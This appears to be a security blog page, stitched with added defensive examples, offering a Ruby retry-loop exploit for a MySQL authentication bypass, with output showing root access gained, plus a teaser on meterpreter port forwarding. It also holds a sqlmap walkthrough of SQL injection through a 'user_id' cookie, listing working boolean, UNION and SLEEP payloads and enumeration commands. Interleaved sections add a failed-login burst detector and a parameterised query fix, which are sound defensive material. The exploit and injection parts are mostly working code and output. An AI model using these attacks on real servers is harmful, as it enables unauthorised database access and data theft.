MySQL Authentication bypass Exploit (Latest)

MySQL authentication bypass latest exploit

#!/usr/bin/ruby
#corenumb
#corenumb.wordpress.com
# usage: ruby file.rb <user> <host>
# Keeps reconnecting with a deliberately wrong password; on an affected server
# one of the attempts is eventually accepted and the mysql> prompt appears.
if ARGV[1]
  while true
    system("mysql -u #{ARGV[0]} mysql --password=blah -h #{ARGV[1]}")
    #sleep 0.1
  end
else
  puts " usage : file.rb root localhost"
end

Output

corenumb@hex-VPCCW16FB:~/pentest$ ruby mysql.rb root localhost
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8754
Server version: 5.5.22-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
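The output above is what the retry loop leaves behind: a burst of "Access denied" warnings for the same user and host within a second or two, then a successful login. The following is an added example, not part of the original post, that scans MySQL 5.5 error-log lines (the format written when log_warnings is at least 2) and reports every user@host that fails more than a threshold of times inside a sliding window. The log lines, timestamps and hosts are constructed for the example.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original post): flag bursts of failed MySQL
# logins per user@host, the footprint of a password-retry loop like the one above.
require 'time'

# Constructed sample in MySQL 5.5 error-log format; timestamps and hosts are made up.
SAMPLE_LOG = <<~LOG
  120612 11:30:45 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:45 [Warning] Access denied for user 'app'@'10.0.0.5' (using password: YES)
  120612 11:30:45 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:45 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:46 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:46 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:46 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:46 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:46 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:47 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:47 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:47 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:47 [Warning] Access denied for user 'root'@'localhost' (using password: YES)
  120612 11:30:48 [Note] some unrelated log line
  120612 11:45:10 [Warning] Access denied for user 'app'@'10.0.0.5' (using password: YES)
LOG

FAIL_RE = /\A(?<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user '(?<user>[^']*)'@'(?<host>[^']*)'/

# Parse one line into [Time, "user@host"], or nil when it is not an access-denied warning.
def parse_failure(line)
  m = FAIL_RE.match(line.strip)
  return nil unless m
  [Time.strptime(m[:ts], '%y%m%d %H:%M:%S'), "#{m[:user]}@#{m[:host]}"]
end

# Return [["user@host", max_failures_in_window], ...] for every principal that
# fails at least `threshold` times inside any `window`-second span.
def find_bursts(log_text, threshold: 10, window: 60)
  by_key = Hash.new { |h, k| h[k] = [] }
  log_text.each_line do |line|
    ts, key = parse_failure(line)
    by_key[key] << ts if key
  end

  bursts = []
  by_key.each do |key, times|
    times.sort!
    start = 0
    best = 0
    # Sliding window over the sorted timestamps: advance `start` until the
    # span [times[start], t] fits inside `window` seconds.
    times.each_with_index do |t, i|
      start += 1 while t - times[start] > window
      best = [best, i - start + 1].max
    end
    bursts << [key, best] if best >= threshold
  end
  bursts
end

if __FILE__ == $PROGRAM_NAME
  find_bursts(SAMPLE_LOG).each { |key, n| puts "burst: #{n} failed logins for #{key}" }
end
```

The threshold and window are deliberately loose; a legitimate user mistyping a password a few times never reaches ten failures in a minute, while the loop above produces dozens per second. Pair the alert with a success event from an audit plugin if one is installed, since the error log alone does not record the eventual accepted login.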

Nice article about port forwarding in post-exploitation

Penetration Testing Lab

The main purpose of port forwarding while performing a penetration test is to help us reach a specific port on a system that doesn’t exist on the same network. In order to understand this better, let’s assume that we have compromised a system which belongs to two networks. The one network is the public one, to which we managed to gain access, and the other one is the private one, where other systems exist as well.

All we have to do is to set up a local listener on our machine that would communicate with the meterpreter session that we have opened from the compromised system. This meterpreter session will actually forward the port to the machine that is running the service and is not accessible directly from our system.

Let’s say that we have successfully exploited the system through a vulnerability and we have opened a meterpreter session. The first thing that we have to do…


MySQL Injection through Cookies

Well, this has been out there for a while now, but I still thought of writing a simple tutorial on SQL injection through cookies.

What are Cookies?

A cookie is a message given to a web browser by a web server. The browser stores the message in a text file, and sends it back to the server each time the browser requests a page from that server. For example, cookies are mostly used to keep a user logged in without making them log in again every time they refresh the page.

The cookie value of our current target is the following:

PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1

SQL Injection With sqlmap

For this example I’ve used sqlmap, which is a very advanced SQL injector. The vulnerable cookie parameter is “user_id”.

Identifying the Vulnerability

root@core-VPCCW16FB:# ./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --level 3 --dbms=MYSQL

    sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

....
[11:30:45] [INFO] heuristic test shows that Cookie parameter 'user_id' might be injectable (possible DBMS: MySQL)
[11:30:45] [INFO] testing sql injection on Cookie parameter 'user_id'
[11:30:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:30:45] [INFO] Cookie parameter 'user_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:30:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:30:46] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:30:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:30:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:30:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[11:30:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:30:56] [INFO] target url appears to have 3 columns in query
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: Cookie
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND 8697=8697

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)
---

[11:30:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
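The three payloads sqlmap found (the tautology, the UNION SELECT and the SLEEP) all work for one reason: the application copies the user_id cookie straight into a SQL string, exactly like it copies a GET parameter. Below is an added example, not the target application's code, that parses a Cookie header, builds the lookup query the vulnerable way, and then the hardened way: reject anything that is not a plain decimal integer and pass the value as a bound parameter. The table and column names are hypothetical, and the "?" placeholder assumes a prepared-statement driver such as mysql2.

```ruby
#!/usr/bin/env ruby
# Added example (not the post's or the target app's code): cookie parsing plus
# the vulnerable and the hardened way of building the user lookup query.

# Split a Cookie header into a Hash of name => value.
# The "user_id" cookie is the injection point sqlmap reported above.
def parse_cookie_header(header)
  header.split(';').each_with_object({}) do |pair, h|
    name, value = pair.strip.split('=', 2)
    h[name] = value.to_s unless name.nil? || name.empty?
  end
end

# Vulnerable: the cookie value is interpolated straight into the SQL text,
# so "1 AND SLEEP(5)" or "1 LIMIT 1,1 UNION ALL SELECT ..." becomes part of the query.
def build_query_unsafe(cookies)
  "SELECT id, name, email FROM users WHERE id = #{cookies['user_id']}"
end

# Hardened: accept only a decimal integer (allowlist, not a blocklist of keywords),
# and hand it to the driver as a bound parameter instead of splicing it into the SQL.
# Returns [sql_with_placeholder, [bound_values]]; raises on anything else.
def build_query_safe(cookies)
  raw = cookies['user_id'].to_s
  unless raw =~ /\A\d{1,18}\z/
    raise ArgumentError, "user_id cookie must be a decimal integer, got #{raw.inspect}"
  end
  ["SELECT id, name, email FROM users WHERE id = ?", [raw.to_i]]
end

if __FILE__ == $PROGRAM_NAME
  # Session id taken from the post; the second header carries sqlmap's time-based payload.
  benign = parse_cookie_header("PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1")
  hostile = parse_cookie_header("PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)")

  puts "unsafe, benign:  #{build_query_unsafe(benign)}"
  puts "unsafe, hostile: #{build_query_unsafe(hostile)}"
  puts "safe, benign:    #{build_query_safe(benign).inspect}"
  begin
    build_query_safe(hostile)
  rescue ArgumentError => e
    puts "safe, hostile:   rejected (#{e.message})"
  end
end
```

A side effect of the allowlist is that it doubles as a detection rule: any request whose user_id cookie fails the integer check is worth logging with its source address, because a legitimate browser never sends anything else in that cookie.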

Current Database

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --current-db

...
current database:    'test'

Table List

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --tables -D'test'
...
Database: test
[1 table]
+------+
| test |
+------+

And from here on it continues like a normal SQL injection.

Cya ..